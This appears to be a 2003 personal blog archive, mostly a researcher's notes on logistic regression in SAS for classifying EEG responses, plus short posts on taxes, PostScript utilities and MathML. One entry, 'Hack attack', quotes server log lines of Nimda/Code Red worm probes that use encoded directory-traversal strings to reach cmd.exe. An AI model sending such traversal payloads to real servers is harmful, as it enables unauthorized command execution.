April 30, 2003

Capital Markets Global Services

Who are these guys? They have two domains, capmktsgs.com and emarketsgs.com, and their earliest post on newsgroups was in July 1998.

Reference USA gives the following info:


Name: CAPITAL MARKETS GLOBAL SVC
Address: 244 MADISON AVE # 339
City: NEW YORK, NY 10016-2817
Contact: MORGAN DENNY (OWNER)
County: NEW YORK
MSA: NEW YORK, NY
Phone: (212) 797-1298
Fax**:
Fortune 1000 Ranking: Not Applicable
Foreign Parent: NO
Employees: Corporate Location 5 to 9
Est Sales: $500,000 to $1 MILLION
Location: SINGLE LOC
Credit Rating Code*: GOOD
ABI Number: 560918856
Public: No
Ticker Symbol: Not Applicable
Toll Free Number: Not Applicable
URL: Not Applicable

SIC: 7361-05, EXECUTIVE SEARCH CONSULTANTS
NAICS: 54161204, HUMAN RESOURCES/EXEC SEARCH CNSLTNG SVCS


In addition, after an inquiry, I got a response from Mr. Denny stating that Capital Markets is "a 7-year old retained and contingency Executive Search and Placement firm, based in mid-town Manhattan," and that he and his 4 partners have "over 125 years of collective experience in consulting, financial services and executive search, coming from the financial services industries and firms serving these industries." Interesting.

Posted by torque at 10:38 AM | Comments (2)

April 15, 2003

Wireless data

I need to transfer 8 channels x 32 x 200 bps = 51,200 bps continuously. A buffer may be necessary - hopefully not. Based on some earlier work, it seems that life would be simplest if we used something like the TR1000 from RF Monolithics. The salesperson suggested the DR2000, which packetizes the data and does some error correction. A microcontroller will be used to take data from 8 ADCs, multiplex them, and transmit the result. We may be able to use some Atmel facilities on campus.

Posted by torque at 3:57 PM | Comments (0)

April 12, 2003

Music lessons and the IRS

Given our proximity to April 15, it is only appropriate to have a tax related blog. So... suppose you are interested in giving music lessons, and you give a number of piano lessons. Certainly, some amount of tax is owed to the government, but how does it work?

Business or hobby. Regardless of profitability, the IRS distinguishes between businesses and hobbies. If your activities are classified as a hobby, not all of your expenses may be deductible. A hobby is an activity that is not engaged in for profit. You can, however, still lose money and be classified as a business, albeit a lousy one. But in order to show that you are a business, you must carry on your activity in a "business-like" manner, i.e., separate checking accounts, good records, etc. For a few lessons, is the distinction critical? Assume for the moment that our activity is a business, on the grounds that we charge the market rate.

Expensability. The IRS has a document on deducting business expenses. There, hobbies are defined as a "not-for-profit activity". In this case, the limitation on expense deductions is the gross income from the activities (see the example on page 5 regarding Ida). This is reasonable. Imagine that you like to build R/C helicopters, and you sell these to your friends at cost. The IRS would expect to receive something from the transaction; however, since you sell at cost, you really aren't making anything, so you shouldn't have to pay any taxes. If you sell to your friends at less than cost, you shouldn't be able to go back and try to reduce the tax liability on the rest of your earnings by claiming the deduction. (However, if you are self-employed and R/C helicopters are your living, you should always be trying to make a profit, in which case, if you do have a loss, it reduces your total earnings, since this is part of what you are trying to do for survival.)

So, what about our piano lessons? As long as the market rate is charged, it seems like the activity should count as a business. If the rate is heavily discounted, that may be more questionable. The problem with lessons is that the cost of materials is not so easily computed. What goes into piano lessons:


  • Experience, previous training
  • Materials - books, etc.
  • Piano - depreciation (if using one's own piano)
  • Rent, real estate expenses (if using one's own studio)
  • Travel expenses (if using client's home, piano)
  • Professional organization membership fees

How to quantify these things is not so clear. Take the piano. Suppose it was given to you as a gift. How do you then use it as a business asset? Would you depreciate a percentage of the piano? Could you, as a person, rent piano time at market rate to yourself as the business person? Would you then pay tax on the rent and then depreciate the piano?

Posted by torque at 11:41 AM | Comments (0)

April 10, 2003

Reorder postscript pages

Reordering postscript pages in unix is very straightforward. There are a number of perl utilities out there, but there is one that is probably on your system already: psselect, part of PSUtils. To use it:


psselect -p<pages> input.ps output.ps

I needed to do what is known as a flipstack. With double-sided printing, the fronts should read 1, 2, 3, ... down the stack; when you reach the bottom, you flip the whole stack over and keep reading to the end. I had 16 pages, so I simply wrote:

psselect -p1,16,2,15,3,14,...,8,9 in.ps out.ps

Amazingly, it worked. I found the solution at Google Groups.

Posted by torque at 12:30 PM | Comments (1)

Line numbers

I wanted to have line numbers down the side of my Word document. But how? Thanks to Google, I found the answer at TechTV.

Posted by torque at 1:30 AM | Comments (0)

April 9, 2003

Stepwise Logistic Regression

After talking with Pat yesterday, it seemed that I was missing the boat on a fundamental technique: stepwise selection. I found a good SAS tutorial at NCSU. In stepwise selection, an attempt is made to remove insignificant variables. The way I had been doing it (though more manually) is also mentioned in the text, and is implemented by using SELECTION=BACKWARD instead of SELECTION=STEPWISE (see the sketch after the stepwise example below). The idea there is to eject variables below a certain significance level.

To run stepwise logistic regression, we specify an entry significance level (SLENTRY=0.#) and a staying significance level (SLSTAY=0.#). LACKFIT requests the Hosmer and Lemeshow lack-of-fit test.

title 'Stepwise logistic regression on class 1 versus class 7';
proc logistic data = A outest=params;
model var16=var1-var15 / selection=stepwise slentry=0.3 slstay=0.35 lackfit;
run;
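
For comparison, here is what the backward-elimination variant mentioned above might look like - a sketch reusing the same data set and variable names, with only the staying level, since backward elimination never enters variables:

title 'Backward elimination on class 1 versus class 7';
proc logistic data = A outest=params;
model var16=var1-var15 / selection=backward slstay=0.35 lackfit;
run;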

Posted by torque at 1:10 PM | Comments (2)

Hack attack

My home PC has been attacked. Judging from the root.exe and cmd.exe requests in the log below, I figured out that it was either Nimda or Code Red.

cmpt-100.usask.ca - - [28/Mar/2003:13:02:27 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294
cmpt-100.usask.ca - - [28/Mar/2003:13:02:27 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
cmpt-100.usask.ca - - [28/Mar/2003:13:02:28 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
cmpt-100.usask.ca - - [28/Mar/2003:13:02:29 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306
cmpt-100.usask.ca - - [28/Mar/2003:13:02:30 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306
cmpt-100.usask.ca - - [28/Mar/2003:13:02:30 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
cmpt-100.usask.ca - - [28/Mar/2003:13:02:30 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316

Posted by torque at 9:01 AM | Comments (5)

April 8, 2003

The tale of two datasets

I took S6A_c37 (C2P from S6A) and randomly split it into two sets, A and B. I then ran PROC CATMOD on each using the algorithm I discussed earlier - discarding redundant variables. Hmm... never mind, maybe this doesn't work. There was no match at all - in fact, even after cutting variables, the p-values for the parameters on A were still bad. It may well be that CATMOD is the wrong tool for this.

As I suspected, the trouble comes from the large number of variables I'm using. I found a useful thread on Google Groups discussing sample size. Essentially, the posters suggest >10 events per independent variable, where "events" is the minimum number of trials of any one class - and we are way off from there. This would suggest that we need >10 x 61 x 7 = 4,270 trials, which we certainly don't have. (Though we might have it in the case of the math...). The only recourse is to take down the number of variables. Since we have ~100 trials of each class, we want <10 variables. Ouch.

Posted by torque at 3:00 AM | Comments (0)

SAS binning

I'd like to be able to randomize and split the dataset so that I can do so-called 10-fold cross-validation. How can I do this in SAS? I found some helpful hints on Marilyn Collins' website. The first step is the SET statement, which allows you to build a new dataset off of an existing dataset. You can, for instance, choose only trigger values greater than 4, e.g., 5, 6, and 7, using:


DATA temp;
SET classify.s6a_c37;
IF var62>4;
RUN;

This posting by David Ward puts us even closer. Aha, but I struck gold at the University of Texas at Austin Statistical Services...

Randomly selecting an approximate proportion


DATA analysis holdout;
SET alldata;
IF RANUNI(0) <= 2/3 THEN OUTPUT analysis;   /* roughly 2/3 of the rows */
ELSE OUTPUT holdout;
RUN;

Randomly selecting an exact proportion

DATA analysis holdout;
SET alldata;
RETAIN k 67 n 100;                 /* select exactly 67 of 100 observations */
IF RANUNI(358798) <= k/n THEN DO;  /* k = number left to select, n = rows left */
k = k-1;
OUTPUT analysis;
END;
ELSE OUTPUT holdout;
n = n-1;
DROP k n;
RUN;

The latter is what I want. The webpage is pretty cool, though; it also has code for fancier resampling techniques such as the jackknife, split-sample, and bootstrap.
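
For the 10-fold cross-validation I actually want, here is a minimal sketch along the same lines - assuming the classify.s6a_c37 data set from before and a made-up seed - that assigns each row a random fold number 0-9 with PROC RANK; holding out one fold at a time gives the ten splits:

DATA shuffled;
SET classify.s6a_c37;
r = RANUNI(12345);        /* random sort key (seed is arbitrary) */
RUN;

PROC RANK DATA=shuffled OUT=folded GROUPS=10;
VAR r;
RANKS fold;               /* fold = 0..9, roughly equal sizes */
RUN;

DATA train holdout;
SET folded;
IF fold = 0 THEN OUTPUT holdout;   /* repeat for fold = 1..9 */
ELSE OUTPUT train;
RUN;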

Posted by torque at 1:50 AM | Comments (0)

April 7, 2003

Observation-based logistic regression

After some discussion with Pat, I decided to attempt to run logistic regression using downsampled observations as the input variables. For each channel there are 61 points, so in total we have 61 x 60 = 3,660 variables - far too many! After a failed attempt at loading the full file into SAS, I chose one channel from S6A, C2P (the best monopolar channel using least squares).

Data. The dataset consists of S6's responses to seven words presented aurally. As mentioned earlier, channel 37, C2P, was selected via earlier results using our traditional method. EEG recordings from Neuroscan, recorded in continuous mode (.cnt), were filtered at 25 Hz and downsampled to 50 Hz. For each trial, the start point was -200 ms from the stimulus trigger and the end point was 1000 ms from the same trigger (1.2 s at 50 Hz, or 61 samples counting both endpoints). Data were then converted into a comma-delimited format and imported into SAS.

Procedure. I used the CATMOD procedure in SAS. Among other things, this procedure allows one to run nominal logistic regression. I used the following script:


PROC CATMOD DATA=classify.s6a_c37;
RESPONSE logits;
DIRECT var1-var61;
MODEL var62=var1-var61 / noprofile;
RUN;

There are several important items to note. By default, CATMOD treats the predictor variables as categorical. In this case our variables are continuous, so we must use the DIRECT statement. There are a total of 61 observation points per trial, var1-var61. The final column, var62, is the class of the trial (1-7).

Results and analysis. The results are difficult to interpret! The format leaves room for improvement... the table to start with occurs halfway through the file and is entitled "Maximum Likelihood Analysis of Variance". The trouble with a multinomial analysis is deciding which variables to throw out. Here's what I did. I looked at the analysis of variance and removed from my model the variables the system flagged as "redundant" (marked with an '*' in the df column). I then re-ran CATMOD. I kept doing this until there were no more "redundant" variables. Then, I took out variables whose p-values were much larger than the smallest (>0.025). After five iterations, I was left with this: var29, var37, var44. The confusing news is that the likelihood ratio is 1.0. What does this mean? I think it means we have a perfect fit - which may have occurred just because I threw out all the other observation points that didn't help. The way to evaluate this is to somehow test it on held-out data - OR - run the model-making algorithm on two sets of data and see how the results compare. If we end up with the same observation numbers, that is awesome news. Most likely they will be completely different.

Other stuff. Oh, I figured out how to output to HTML using ODS. I regenerated the 'fifth cut' by nesting the MODEL statement (CATMOD is an interactive procedure, so another MODEL/RUN group can be submitted while it is still active):

ods html body='WWW/tuning/saslogs/test.html';
MODEL var62=var29 var37 var44 / noprofile;
title2 'Fifth cut';
run;
ods html close;

Posted by torque at 9:50 PM | Comments (0)

Fast Robust Logistic Regression

I found an article today from Carnegie Mellon entitled Fast Robust Logistic Regression for Large Sparse Datasets with Binary Outputs. Paul Komarek and Andrew Moore from the Auton Lab compared logistic regression with a number of other classification tools (like support vector machines) and found little difference in performance, contrary to popular belief. Of particular interest to me were their data sets and methodology. The data consisted of life sciences data with up to a million attributes. This is interesting because I was considering doing the same with EEG data but was concerned about overfitting.

Data. The authors used two sets of data, ds1 and ds2. ds1 consists of ~6,000 binary attributes and 27,000 rows; ds2 has ~1,000,000 binary-valued attributes and 90,000 rows. The interesting thing about the latter is that the number of attributes exceeds the number of rows. There are caveats, however. Unlike our attributes (the waveform, and potentially the spectrum), ds1 and ds2 are sparse, meaning that there are few non-zero attributes. In fact, they basically end up showing that reducing the data down to 10 or 100 attributes using Principal Component Analysis (PCA) gives results similar to using the full set of data.

In our case the attributes are continuous and dense. ds1 and ds2 are life sciences data; I suspect that they must encode the presence of certain genes, hence the binary attributes. ds1 has a sparsity factor F = 0.0220 while ds2 has a sparsity factor of F = 0.0003. Assuming that the non-zeros are evenly distributed (which they won't be), we would arrive at ~132 non-zero elements/row for ds1 and ~300 elements/row for ds2. What I will probably try next is to do classification based on logistic regression by channel, and compare channel results. After that, we can see if combining channels (basically concatenating the waveforms) makes any difference.

Analysis. Two things were interesting in the paper. To compare results, they used 10-fold cross-validation. I should do this on my results as well. They also use an interesting plot called a Receiver Operating Characteristic (ROC) curve. To construct this curve, the dataset rows are first sorted in order of decreasing predicted probability. Then, starting from the graph origin, the rows are stepped through, moving one unit up if the row is positive and one unit right otherwise. On a dataset of P positive and R-P negative rows, a perfect learner starts at the origin, goes up to (0,P), and then goes straight across to (R-P,P). A random guesser moves from the origin directly along the diagonal to (R-P,P).
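
A minimal SAS sketch of that stepping, assuming a hypothetical data set called scored with a predicted probability phat and a 0/1 outcome y (the names are made up here):

proc sort data=scored;
by descending phat;       /* rows in order of decreasing probability */
run;

data roc;
set scored;
if y = 1 then tp + 1;     /* positive row: one unit up */
else fp + 1;              /* negative row: one unit right */
output;                   /* (fp, tp) traces out the ROC curve */
run;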

The success of the learning is measured by the area under the ROC curve (AUC). A perfect learner has an AUC of 1.0 while a random guesser has an AUC of 0.5. The data were partitioned 10 times (10-fold) to calculate the standard deviation of the AUC. The same 10 partitions are used to compare the various algorithms, and comparisons are made pairwise on the same partition.

Posted by torque at 11:03 AM | Comments (2)

April 6, 2003

PCVideoOnline.com

Looking at laptops, I stumbled upon a company called PCVideoOnline which seemed to have unbelievable pricing. I'll let the reviews speak for themselves. They are very extreme - either 1's or 5's - which makes it quite... err... interesting.

OSDN Pricegrabber
Epinions
Bizrate

Sure enough, the laptop turned out to be "Class A Refurbished" with a 90-day warranty. Now, this may not be bad, since many times people return laptops within 30 days, and these turn into "refurbished" units. Still, it would seem more honest if they just said so up front on the site, instead of advertising it as if it were new. Also, there is an additional 4% "insurance" charge.

Posted by torque at 5:07 PM | Comments (8)

April 4, 2003

Ordinal versus Nominal

In an earlier post, I described my first (rather weak) attempt at logistic regression. It failed because I did not structure the problem properly. I was trying to see which channels contributed most to recognition using each channel's classification rate. Of course, this is exactly what the algorithm gives back. In order to use logistic regression in our problem, we need to use it to give back not the classification rate of each channel, but the probability that the trial is a particular class given the results of each channel. I've italicized results because we can either look at the output of our least squares or correlation coefficient classification, or we can look at a more basic level at the waveforms themselves. I will start with the former. Besides binary responses, logistic regression can be used to classify both nominal and ordinal responses. Nominal responses are unordered, e.g., French, Italian, or Thousand Island. Ordinal responses are ordered, e.g., no pain, slightly painful, or really painful. In our particular application, the classification classes are nominal. This type of analysis is known as nominal, multinomial, or polytomous logistic regression.

In SAS, PROC LOGISTIC is used for ordinal logistic regression while PROC CATMOD is used for nominal logistic regression. I will be using the latter. Fortunately, SAS gives some examples on how to use this in command-line mode. An even better tutorial can be found at Queens. Unfortunately, I could discern no way of running this procedure from Analyst. Incidentally, I found a quick reference on file handling in SAS. Be careful not to erase your file. The DIRECT keyword should not be used here, as it specifies that the data should be treated as quantitative rather than qualitative, and in this case each channel's output is a class, which is qualitative.

The data should be formatted like so:


Ch1   Ch2   Ch3   Ch4   Ch5   Truth
1     5     4     3     5     6

where the numbers under Ch# indicate the class each channel assigns to the trial. Remember, the goal is to derive the appropriate weighting for the channel results.
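
A minimal sketch of what the CATMOD call might look like for data in this form - assuming it has been read into a data set I'll call chanresults (a made-up name), and leaving the channel variables categorical by omitting DIRECT, as discussed above:

proc catmod data=chanresults;
response logits;
model Truth = Ch1 Ch2 Ch3 Ch4 Ch5 / noprofile;   /* no DIRECT statement: Ch1-Ch5 stay qualitative */
run;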

Posted by torque at 9:33 AM | Comments (0)

April 3, 2003

MathPlayer

I realized that I needed a good way of displaying equations. Rather than going the graphical route, I decided to try MathML. If you are using Internet Explorer, you will need either IBM Techexplorer ($27, 30-day trial) or Design Science MathPlayer (free... at the moment). Design Science are the same people who make MathType and the Equation Editor in Microsoft Word - so I doubt it will remain free for long. I've included a link to MathPlayer in the right-hand column under "Tools". Incidentally, if you are using the latest version of Netscape, Amaya, or Mozilla, you don't have to download anything. For more details click here. Unfortunately, it's still not quite working perfectly on this blog, as MathML is designed to be served as XML, not XHTML. It does work for IE users with MathPlayer installed, though.

MathPlayer. If you are willing to lock your users into IE6 and MathPlayer, you can follow the instructions at Design Science. This is obviously not ideal, but I had a hard time getting anything else to work, even though MovableType does use XHTML. The problem with this setup is that MovableType inserts a "br" each time you press enter. This totally mixes up the MathML and messes up the equation. To get it to work, you must have no carriage returns anywhere between m:math and /m:math.

This is a MathPlayer test:
x^2 + 9x + 9 = 0

Generalization. There must be a way to avoid locking ourselves into MathPlayer; however, the way is not yet evident. I found some tips on parsing MathML at the w3.org website, but they don't work here. I can write XML that will work, but in XHTML we may well need to declare the MathPlayer object. If you are using Linux, this page probably even gave you an error!

Posted by torque at 2:09 PM | Comments (6)

Logits and Classification

How to structure the problem is a big issue. Usually logistic regression is used in situations where the potential factors are quite clear - for instance, weight, sex, and family history as they relate to a disease like heart disease. In our case, it is not so evident what factors to use in the model. We could, for instance, use logistic regression as a sort of bootstrap for our existing classification scheme: determine how each channel contributes to correct classification and create a weight. Or, we could start at a more basic level and let each observation point be a factor to be analyzed. A consideration in the latter case is the great potential for overfitting.

Potential methods. In the current implementation, we are able to obtain, for each training trial, N channels of match or no match. We have this for each grid point. We can go further by considering the class that each channel matches to (1 through 7). The next level would be to examine the least squares or correlation coefficient against each class. Finally, we can discard our measure altogether and use each observation point (or Fourier component) as a factor in the analysis. Note: from now on I will only consider data downsampled using Marcos' (traditional) method, so that there is no controversy regarding the base data.

Match - first cut. In the "match" analysis, rather than simply using the results of the best channel, we can consider all the other channels. But how can we weight the significance of the other channels? We can do it with logistic regression. In this case, the response is binary - either 1 or 0, match or no match. The explanatory variables are the results for each channel, either 1 or 0. In the VA monopolar data there are 60 channels; in the bipolar data, however, there are 1,770 channels - clearly a recipe for overfitting. We can reduce the data set by considering only the best m channels, or we can run all of them and take out channels that seem irrelevant after we do the logistic regression.

To build the model, we would use something like:


channel   train   total
Cz        43      193
Fz        12      193
Pz        54      193
C4        22      193

But does this really help us? I tried running this dummy data set using SAS Analyst and got the following results (under "Analysis of Maximum Likelihood"):

parameter   DF   estimate   std err
intercept   1    -1.7398    0.1106
C4          1    -0.3108    0.1946
Cz          1     0.4903    0.1649
Fz          1    -0.9738    0.2380

What does this mean? Now I'm thinking that I thought about this wrong. I found some notes on deciphering SAS output. I feel like somewhere along the line I needed to tell SAS that I was supposed to get 193/193, but I haven't done that... Basically, the analysis says that the log of the odds is given by

g = -1.7398 - (0.3108 x <1>) + (0.4903 x <2>) - (0.9738 x <3>)

This is probably not what I wanted. The translation table for the channels is given by:

channel   <1>   <2>   <3>
C4         1     0     0
Cz         0     1     0
Fz         0     0     1
Pz        -1    -1    -1

So, in fact, what we have calculated here is the expected odds of a correct classification for any given channel. This does not mix the channels like I wanted. Let's see how well it worked. Suppose my channel is Pz. Then

g_Pz = -1.7398 + 0.3108 - 0.4903 + 0.9738 = -0.9455

p/(1-p) = e^-0.9455 = 0.3885

p = 0.3885/1.3885 = 0.2798

Of course, this is right where we started, since

0.2798 x 193 = 54.0

So, we are still not thinking about this correctly. Though it is nice to see that the results are not too weird.
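
As a sanity check on the arithmetic above, here is a little DATA step - just a sketch, with the estimates and the 193 trial count taken from the dummy tables earlier - that recomputes the fitted counts from the parameter estimates:

data check;
/* estimates from the table above (effect coding, Pz is the -1 -1 -1 level) */
b0 = -1.7398; bC4 = -0.3108; bCz = 0.4903; bFz = -0.9738;
g_Cz = b0 + bCz;                 /* design row for Cz:  0  1  0 */
g_Pz = b0 - bC4 - bCz - bFz;     /* design row for Pz: -1 -1 -1 */
p_Cz = exp(g_Cz) / (1 + exp(g_Cz));
p_Pz = exp(g_Pz) / (1 + exp(g_Pz));
n_Cz = 193 * p_Cz;               /* comes back to ~43, the Cz train count */
n_Pz = 193 * p_Pz;               /* comes back to ~54, the Pz train count */
run;

proc print data=check; run;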

Posted by torque at 10:25 AM | Comments (2)

April 2, 2003

SAS and Logistic Regression

I've been playing around with logistic regression in SAS. In case you should happen to need to do the same, here are a few useful things. First of all, as it helps to have a GUI, get VNC installed and running - this will let you run X Windows on a PC. I was fortunate to find some helpful scripts from Chaiyasit Manovit, who incidentally rocks. Unfortunately, I had problems saving file templates, but still did not have too bad a time importing my data. A good place to start is the Analyst (under Solutions->Analysis->Analyst).

Posted by torque at 3:54 PM | Comments (1)